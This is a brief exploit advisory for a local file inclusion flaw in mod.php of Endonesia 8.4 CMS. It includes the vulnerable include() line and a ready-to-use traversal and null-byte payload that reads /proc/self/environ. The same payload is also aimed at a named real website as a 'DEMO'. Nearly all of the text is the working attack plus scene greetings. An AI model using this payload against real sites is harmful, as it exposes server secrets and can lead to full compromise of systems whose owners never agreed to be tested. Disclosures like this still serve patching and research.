[*] Endonesia 8.4 CMS [*] Site: http://www.endonesia.org/ [*] Download: http://sourceforge.net/projects/endonesia [*] Bug: Local File Inclusion in mod.php file ! [*] Author: s4r4d0 [*] Mail: s4r4d0@yahoo.com [*] Team: Fatal Error [*] Poc:http://www.site.com/mod.php?mod=/../../../../../../proc/self/environ%00 [*] DEMO:http://www.trubus-online.com/mod.php?mod=/../../../../../../proc/self/environ%00 [*] SecurityReason Note : # # Vulnerable Code in mod.php : # # include("./mod/$mod/index.php"); # # magic_quotes = Off # # - sp3x # [*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x ! [*] Made in Brazil [*] Reference: http://securityreason.com/exploitalert/7435